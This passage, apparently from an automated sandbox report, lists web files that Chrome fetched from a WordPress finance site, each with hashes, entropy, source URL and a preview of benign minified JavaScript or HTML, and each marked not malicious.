                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".fusion-video").each(function(){!jQuery(this).parents(".fusion-modal").length&&1==jQuery(this).data("autoplay")&&jQuery(this).is(":visible")&&jQuery(this).find("iframe").each(function(){jQuery(this).hasClass("lazyload")?jQuery(this).on("lazyloaded",function(){this.contentWindow.location.replace(jQuery(this).attr("data-orig-src").replace("autoplay=0","autoplay=1"))}):jQuery(this).attr("src",jQuery(this).attr("src").replace("autoplay=0","autoplay=1"))})}),jQuery(window).on("resize",function(){var e,i=document.querySelectorAll("iframe"),o=i.length;if(jQuery(".fusion-youtube").each(function(){jQuery(this).is(":visible")||jQuery(this).parents(".fusion-modal").length&&!jQuery(this).parents(".fusion-modal").is(":visible")||jQuery(this).find("iframe").each(function(){this.contentWindow.postMessage('{"event":"command","func":"pauseVideo","args":""}',"*")})}),"undefined"!=typeof Vimeo)for(e=0;e<o;e++)!(void 0!==i[e].src&&-1<i[e].src.toLowerCase().indexOf
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9731), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9731
                                                                                                                                                                                                                                                                        Entropy (8bit):5.145708846809212
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:mW54pABXzRx0PRRWornO0dzUlwvdKYKcCV4gG75C8NSY6Q+yWrfWU/W/TGs35hmn:VFdUUdGTSIKWgW/Ta2e2q
                                                                                                                                                                                                                                                                        MD5:57D6F474F307D2454105B587E53CD518
                                                                                                                                                                                                                                                                        SHA1:2F71EECA04901F779998F7BD8C35D7EF09FEEC34
                                                                                                                                                                                                                                                                        SHA-256:2F5C6401951B4197532CF9DF977374A74BF57F91B26C1D6D2B74B94546005A79
                                                                                                                                                                                                                                                                        SHA-512:6F25D0E3788698994835F66A808B44A28031756C8D7C9924265A21688FD80517E80DAF11EE2D2617CB5D5CAF7785EF3B59BF30A0A170E3B5624BE30D6639EF97
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var arr_all_conditions=[],um_field_conditions={},um_field_default_values={};function um_get_field_default_value(e){var i,n="",t=um_get_field_type(e);switch(t){case"text":case"number":case"date":case"textarea":case"select":n=e.find('input:text,input[type="number"],textarea,select').val();break;case"multiselect":n=e.find("select").val();break;case"radio":1<=e.find('input[type="radio"]:checked').length&&(n=e.find('input[type="radio"]:checked').val());break;case"checkbox":1<=e.find('input[type="checkbox"]:checked').length&&(n=1<e.find('input[type="checkbox"]:checked').length?((i=[]).push(n),e.find('input[type="checkbox"]:checked').each(function(){i.push(jQuery(this).val())}),i):e.find('input[type="checkbox"]:checked').val());break;default:n=wp.hooks.applyFilters("um_conditional_logic_default_value",n,t,e)}return{type:t,value:n}}function um_get_field_element(e){var i=e.find("input,textarea,select"),n=um_get_field_type(e);return wp.hooks.applyFilters("um_conditional_logic_field_element",i,n,
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (39933)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):359668
                                                                                                                                                                                                                                                                        Entropy (8bit):5.522856819864976
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:1wGXADTn26XNaYxulxrgBEiSaxP64ckAju:VUaYSa
                                                                                                                                                                                                                                                                        MD5:9C36B5CFA8304790D1226699C41364B7
                                                                                                                                                                                                                                                                        SHA1:2B5E6899842E31944A69AD26EBEBE97CAD24A0B4
                                                                                                                                                                                                                                                                        SHA-256:76FC942FBC84AC375CA62B62107746983DB236C885498697AEE68A6FB3E7D0D1
                                                                                                                                                                                                                                                                        SHA-512:4913168EC446191305A7A4EF0839883C2E3FC17993309B12843FAE7CEF122787F3966DE3E60D05E9D558564D81F1DA741839323E3E8018C655345FA0A3E0DAF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://newassets.hcaptcha.com/captcha/v1/b4956db/static/hcaptcha.html
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en" data-id="hcaptcha-frame-b4956db">.<head>. <title>hCaptcha</title>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Security-Policy" content="object-src 'none'; base-uri 'self'; worker-src blob:; script-src 'self' 'unsafe-eval' 'sha256-ZqThWN4ha5azD3p/ChDw3zo0I3AT/L2tlIsbICnHj9I=';">. <style type="text/css">*{-webkit-tap-highlight-color:transparent;-webkit-font-smoothing:antialiased}body,html{margin:0;padding:0;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen,Ubuntu,"Helvetica Neue",Arial,sans-serif;overflow:hidden;height:100%;width:100%;background-color:rgba(255,255,255,0);background-color:transparent}fieldset{margin:0;padding:15px 20px;border:none}button:focus,input:focus,select:focus,textarea:focus{outline:0}:focus{border:none;outline:0}textarea{border:none;overflow:auto;outline:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;resize:non
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                        Entropy (8bit):3.066054462414549
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:M3SLlHh/:f/
                                                                                                                                                                                                                                                                        MD5:729C3007A8ED0597531B0C76D54A94BB
                                                                                                                                                                                                                                                                        SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                                                                                                                                                                                                                                        SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                                                                                                                                                                                                                                        SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://pluralism.themancav.com/NpKLjU2w6ORSsLG/AKanr0Xm7v0UqKnhV/zv5Fj11P5C8//+FL6p/kKwsb8asPmvDLDz+kz25edY/eP/RuD94lroqfA=
                                                                                                                                                                                                                                                                        Preview:GIF87a........jl...,...........D..;
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (885), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):885
                                                                                                                                                                                                                                                                        Entropy (8bit):4.909217118842004
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:KnPy7J31HQ59Eo5WvGQbdQblYQbzIRYQbWcYQb/wMXUvEJe:KnP2W609IGmxQn
                                                                                                                                                                                                                                                                        MD5:9976A7E9855529DF374B54BA15C8B57D
                                                                                                                                                                                                                                                                        SHA1:D8FF4D5BF04E48A00BACAB2BBE1613E495139EC0
                                                                                                                                                                                                                                                                        SHA-256:FA230B2E4F8304E9BED43CD46B687D50E17D777B2A94407C2055B76EDEE06757
                                                                                                                                                                                                                                                                        SHA-512:570F98FFA8573C7FC401F82744BE2DC683426F97D2DA1B1D2E4DD3862B6E428B884A592DE0B56CFA53FB14469D82E8E578FCFB0F139B5439A808501C8C7A152D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function calcSelectArrowDimensions(e){var n=".avada-select-parent .select-arrow, .gravity-select-parent .select-arrow, .wpcf7-select-parent .select-arrow";(void 0!==e?jQuery(e).find(n):jQuery(n)).filter(":visible").each(function(){0<jQuery(this).prev().innerHeight()&&jQuery(this).css({height:jQuery(this).prev().innerHeight(),width:jQuery(this).prev().innerHeight(),"line-height":jQuery(this).prev().innerHeight()+"px"})})}jQuery(window).on("load fusion-element-render-fusion_tb_woo_cart fusion-element-render-fusion_tb_woo_checkout_tabs fusion-element-render-fusion_tb_woo_checkout_billing fusion-element-render-fusion_tb_woo_checkout_shipping fusion-element-render-fusion_woo_cart_shipping",function(){calcSelectArrowDimensions(),setTimeout(function(){calcSelectArrowDimensions()},100)}),jQuery(window).on("fusion-dynamic-content-render",function(e,n){calcSelectArrowDimensions(n)})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5910), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5910
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1110879069805835
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:CWM5xkc/fB7djdZyT9uHSc5uQ4w2sGC6A34gzjG3GAGG/GC:Cj5xVdf+c5Hl6AfHAuC
                                                                                                                                                                                                                                                                        MD5:8000D40207FAC2BA06A65DF8DA0F280A
                                                                                                                                                                                                                                                                        SHA1:9FA36112B02A1E35E70AA1D2EB49442D0AD54AE9
                                                                                                                                                                                                                                                                        SHA-256:B8F4A22F58424ADC766B511DB3293B2721793A380FCF4CB19E56C5D7ADB7B40B
                                                                                                                                                                                                                                                                        SHA-512:0B3084247CD5A42CE06EF1F3B1D0C92B3E9D63F9292C68E0F99269D96202AB0A97521F78B7A3FC486D2758C1B1C7360396CA189E82D79FECF4BD7DA9A22E6261
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){function e(e,n,i,s){var a=e.text().split(n),l="";a.length&&(t(a).each(function(t,e){l+='<span class="'+i+(t+1)+'">'+e+"</span>"+s}),e.empty().append(l))}var n={init:function(){return this.each(function(){e(t(this),"","char","")})},words:function(){return this.each(function(){e(t(this)," ","word"," ")})},lines:function(){return this.each(function(){var n="eefec303079ad17405c889e092e105b0";e(t(this).children("br").replaceWith(n).end(),n,"line","")})}};t.fn.lettering=function(e){return e&&n[e]?n[e].apply(this,[].slice.call(arguments,1)):"letters"!==e&&e?(t.error("Method "+e+" does not exist on jQuery.lettering"),this):n.init.apply(this,[].slice.call(arguments,0))}}(jQuery),function(t){"use strict";function e(e){return/In/.test(e)||t.inArray(e,t.fn.textillate.defaults.inEffects)>=0}function n(e){return/Out/.test(e)||t.inArray(e,t.fn.textillate.defaults.outEffects)>=0}function i(t){return"true"!==t&&"false"!==t?t:"true"===t}function s(e){var n=e.attributes||[],s={};return n.len
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1161), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1161
                                                                                                                                                                                                                                                                        Entropy (8bit):5.024506502925189
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:nW1DqE2/kLlqzZhhHFZYEgJ/G3sOYEgJ/G3WZBSHnIYEgJ/G3sMAHlgJ/G3sty:noT2/F1DlZYE8/G3sOYE8/G3WZYHIYEu
                                                                                                                                                                                                                                                                        MD5:D240D862E915D0D2B233B3DAA0F3FF55
                                                                                                                                                                                                                                                                        SHA1:EF71A95FF68AFBAAF39B2FB17A41BB31AD70F049
                                                                                                                                                                                                                                                                        SHA-256:CDD3800A3D91660FECC0241EF69A6DC77C8C33F677AF53D431C91E42BD7FEA51
                                                                                                                                                                                                                                                                        SHA-512:FE7EA5F1CA2EF53CA38C0049E09169EA0CE8E3BA7C57915DD6E24E7FCEA4B45E93D007625DE0A09DC32588E89E7E95A12C9D99BF83997267189EE40812DCBEEB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";t.fn.fusionScroller=function(e){var f=t.extend({type:"opacity",offset:0,endOffset:""},e);t(this).each(function(){var e,i,r,o=this;t(window).on("scroll",function(){var s,l,p,c;e=t(o).offset().top,t("body").hasClass("admin-bar")&&(e=t(o).offset().top-t("#wpadminbar").outerHeight()),0<f.offset&&(e=t(o).offset().top-f.offset),i=t(o).outerHeight(),r=e+i,f.endOffset&&t(f.endOffset).length&&(r=t(f.endOffset).offset().top),(s=t(this).scrollTop())>=e&&s<=r&&(l=(r-s)/i*100,"opacity"===f.type?(p=l/100*1,t(o).css({opacity:p})):"blur"===f.type?(c="blur("+(l=100-l)/100*50+"px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,filter:c})):"fading_blur"===f.type&&(p=l/100*1,c="blur("+(l=100-l)/100*50+"px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,filter:c,opacity:p}))),s<e&&("opacity"===f.type?t(o).css({opacity:1}):"blur"===f.type?(c="blur(0px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):82562
                                                                                                                                                                                                                                                                        Entropy (8bit):5.385036967667991
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:3ZcKgyELPr7rSrMUGrhrHrARa8G50rU2yvPvUhOj/r8oCheciz7oK:Jn0UP5O2yvPvbjwK
                                                                                                                                                                                                                                                                        MD5:53700E84E0A3ED3F813A8238743F0C39
                                                                                                                                                                                                                                                                        SHA1:3B03A6B647C75A38B6A1F9F941C28E30788760EE
                                                                                                                                                                                                                                                                        SHA-256:5D658FCE19B44713B4FD23E9D5987CF2642359724DACB20CCD110D7F652C5DE5
                                                                                                                                                                                                                                                                        SHA-512:917129414FBB4F720E629310181677D9C742453BA59A6038AE09B210B44713A832131C6737C1793DA6EF7BD9C956E4ACDD12724019C589531A7B5FDB4DB4DBDB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.ilightbox.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function($,window,undefined){var extensions={flash:["swf"],image:["bmp","gif","jpeg","jpg","png","tiff","tif","jfif","jpe","webp"],iframe:["asp","aspx","cgi","cfm","htm","html","jsp","php","pl","php3","php4","php5","phtml","rb","rhtml","shtml","txt"],video:["avi","mov","mpg","mpeg","movie","mp4","webm","ogv","ogg","3gp","m4v"]},$win=$(window),$doc=$(document),browser,transform,gpuAcceleration,fullScreenApi="",userAgent=navigator.userAgent||navigator.vendor||window.opera,supportTouch="ontouchstart"in window||navigator.msMaxTouchPoints,isMobile=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(userAgent)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):161
                                                                                                                                                                                                                                                                        Entropy (8bit):4.580019668141676
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:UGDX9L3oPlRqLVWrAifp3i6ZfYJ6a8MDXAiJ7WXa/5vf4mM:UGDNLoPlRqxL8p3jY8M0q7Wu1Q7
                                                                                                                                                                                                                                                                        MD5:C12BAA4531AFDBFC0486131A6CE4C112
                                                                                                                                                                                                                                                                        SHA1:076BD55231BE5DB2170E79B0263F16EF4DC46991
                                                                                                                                                                                                                                                                        SHA-256:4EA61B2F9D14A61CC6BEB17A978D9D9CE25826628D4DAB8DC24E933B854D1009
                                                                                                                                                                                                                                                                        SHA-512:3D695709D0EAB8F90296D2198815A282BF80132FDD75DA2D745B80B4910687E2295D74087F7760D422BDFCCB32A1CF76EA40DD5C5A24762B9DF873AD485C7D3A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/**/pfMod.saveDSSettings({"domain_settings":{"ad_free":true,"brand_free":false,"ad_type":"ad_free","classification":"TBD","redirect":false,"bk_redirect":false}})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):395
                                                                                                                                                                                                                                                                        Entropy (8bit):5.484241622671332
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:zAMoIEFjelzFDfVCiul7foJPQ7YKR4v/CMwK1eJ:zAMoIEFqzzu5fUYY/wK1eJ
                                                                                                                                                                                                                                                                        MD5:D15D631AAE56C61F822351F352725AEF
                                                                                                                                                                                                                                                                        SHA1:BFAFDB6ADFD6ABC0682802EA3555283D36ED8CAB
                                                                                                                                                                                                                                                                        SHA-256:C14977050174E109AF9D3A1518823F590FB653267F5F83AAA839E9B4D338B3EA
                                                                                                                                                                                                                                                                        SHA-512:D1E4DFBBFC5AE2E850C6D9DA79B83B3B0644F88E978EDDD061EF56F7CF775064145ABE8A3BE7589BDA4F275B6F77B0D2E74FE6C8472E25D0B248435C1EF8136E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function($){var testImg='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNzUiIGhlaWdodD0iMjc1Ij48L3N2Zz4%3D';var img=document.createElement('img').img.setAttribute('src',testImg);img.addEventListener('load',function(){$('img.quicklatex-auto-format').attr('src',function(){return $(this).attr('src').replace('.png','.svg')})},!0)})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2974), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2974
                                                                                                                                                                                                                                                                        Entropy (8bit):5.013524611685299
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Nv2qNPFwKT6grtk7mM7J65wD8wdRO0jUIELdcp5Jp5LC4E79snXMheC:BzPheglM7J1ROJIE56lLNE7KnX0
                                                                                                                                                                                                                                                                        MD5:B49CCDD229B87B0370D3ADD68A5238FB
                                                                                                                                                                                                                                                                        SHA1:2AABB7B066217F5E11896918F25930186B069571
                                                                                                                                                                                                                                                                        SHA-256:C9DA0D53D9CFEA50BDE35EF3DAD69B359B20185BE86E4E4B08F7581CE9D0027A
                                                                                                                                                                                                                                                                        SHA-512:BEC1149A7A645C066D64F4B0C0D1BB8394D05D469ADCC88AB1DE3565037F5223A14F7FA8B14B3465A87E10BDA2D666D8653FDCB564FBEE10C00D7EBD5A827C41
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";function s(e,i){this.processWithBind=t.proxy(this.process,this),this.$body=t("body"),this.$scrollElement=t(e).is("body")?t(window):t(e),this.options=t.extend({},s.DEFAULTS,i),this.selector=(this.options.target||"")+" li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",this.processWithBind),this.refresh(),this.process()}function e(e){return this.each(function(){var i=t(this),o=i.data("bs.scrollspy"),r="object"==typeof e&&e;o||i.data("bs.scrollspy",o=new s(this,r)),"string"==typeof e&&o[e]()})}s.VERSION="3.3.2",s.DEFAULTS={offset:10},s.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},s.prototype.refresh=function(){var s="offset",e=0;fusion.isWindow(this.$scrollElement[0])||(s="position",e=this.$scrollElement.scrollTop()),this.offsets=[],this.targets=[],this.scrollHeight=this.getScr
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (3259), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3260
                                                                                                                                                                                                                                                                        Entropy (8bit):5.186199563081735
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:tOLetC5CGf/6GTGgzsLNTzte4JIVAJPVXEGy3so5AQBJr55byZ/LzyQi:tOmCQO6Gzf8IeFVLyciNvmzji
                                                                                                                                                                                                                                                                        MD5:D1B47987170F121AD243ECA9674E844E
                                                                                                                                                                                                                                                                        SHA1:EFA92526560175BF68ABFEF026CCB8D07973E07D
                                                                                                                                                                                                                                                                        SHA-256:FA71793AF74B17DFE771BB2A0F495200359D8CFF358FEAA7F855CF3B17DB7B56
                                                                                                                                                                                                                                                                        SHA-512:0481DC2C776C232F55492F85EF000CFD7D2B2B55622039E79B0124A22063303227115BC9F5A1B42BAAF730E4FF4F0CE623BA47635ED1FCAADE734AC58C50A267
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function o(n,i,s){function a(e,t){if(!i[e]){if(!n[e]){var r="function"==typeof require&&require;if(!t&&r)return r(e,!0);if(c)return c(e,!0);throw(t=new Error("Cannot find module '"+e+"'")).code="MODULE_NOT_FOUND",t}r=i[e]={exports:{}},n[e][0].call(r.exports,function(t){return a(n[e][1][t]||t)},r,r.exports,o,n,i,s)}return i[e].exports}for(var c="function"==typeof require&&require,t=0;t<s.length;t++)a(s[t]);return a}({1:[function(t,e,r){"use strict";function n(t){return t.innerHTML||t.value}function i(t,e){t.innerHTML?t.innerHTML=e:t.value=e}function o(t,e){this.formEl=t,this.button=t.querySelector('input[type="submit"], button[type="submit"]'),this.char=null!=e?e:".",this.button&&(this.originalButton=this.button.cloneNode(!0))}o.prototype.start=function(){var t,e=this.button,r=this.formEl,o=this.char;e?(t=this.button.getAttribute("data-loading-text"))?i(e,t):(e.style.width=window.getComputedStyle(this.button).width,i(e,o),this.loadingInterval=window.setInterval(this.tick.bind(this),50
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):58876
                                                                                                                                                                                                                                                                        Entropy (8bit):5.405683338218142
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                                                                                                        MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                                                                                                        SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                                                                                                        SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                                                                                                        SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2060), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                                                                                        Entropy (8bit):5.172673320849662
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:aRM3Pl9l3PRMq4d3P4Q/4Q3P4dzs3PdkI3kzBRG3PvyRC3PJndS8MDmedOJNdRSB:uSNzXLgcl6YOJNdRi
                                                                                                                                                                                                                                                                        MD5:7B10A7F00F377346529243B7B787241A
                                                                                                                                                                                                                                                                        SHA1:C8DE259E0CBEF95FEC00A4A19C0D61FBC1822161
                                                                                                                                                                                                                                                                        SHA-256:F4C0E513103A912AFD6C87C9448A31EC292ACC10E57D52CB34A53126797C1CCC
                                                                                                                                                                                                                                                                        SHA-512:7CFAB9FB25458069323743B23792CBD3AF8F9EEEAFB460D4DF053D659E9265CE7FA371EDBC7591DE7736A69D2B9B7EBCD00DF76AD7FFBEB99882D5A4E13643A0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-background-slider.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(e){const t={slide:{prev:{translate:[0,"-100%",0],opacity:0},next:{translate:[0,"100%",0],opacity:0}},slide_down:{prev:{translate:[0,"100%",0],opacity:0},next:{translate:[0,"-100%",0],opacity:0}},slide_left:{prev:{translate:["-100%",0,0],opacity:0},next:{translate:["100%",0,0],opacity:0}},slide_right:{prev:{translate:["100%",0,0],opacity:0},next:{translate:["-100%",0,0],opacity:0}},stack:{prev:{translate:[0,"60px","-30px"],scale:.7,opacity:0},next:{translate:[0,"100%",0]}},zoom:{prev:{scale:1.3,opacity:0},next:{scale:.7,opacity:0}},"slide-zoom-out":{prev:{translate:[0,"-100%",0],scale:1.5,opacity:0},next:{translate:[0,"100%",0],scale:1.5,opacity:0}},"slide-zoom-in":{prev:{translate:[0,"-100%",0],scale:.8,opacity:0},next:{translate:[0,"100%",0],scale:.8,opacity:0}}};function a(a){const o=a.dataset.type||"container",n=a.dataset.animation||"fade",s="fade"===n?"fade":"creative";let i="creative"===s?t[n]:"";const c="no"===a.dataset.loop,l=Number(a.dataset.slideshowSpeed)||5e3,r=Num
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):189
                                                                                                                                                                                                                                                                        Entropy (8bit):4.525356658794344
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:TMQM+LhXEHJducXyBuZRMQM+LsLQrGztXyBuZRMQN9ctXytpffduvMQAI16IvT8I:AuhEpgsMuYLQr6MuuvM9I4IvTDMuClsT
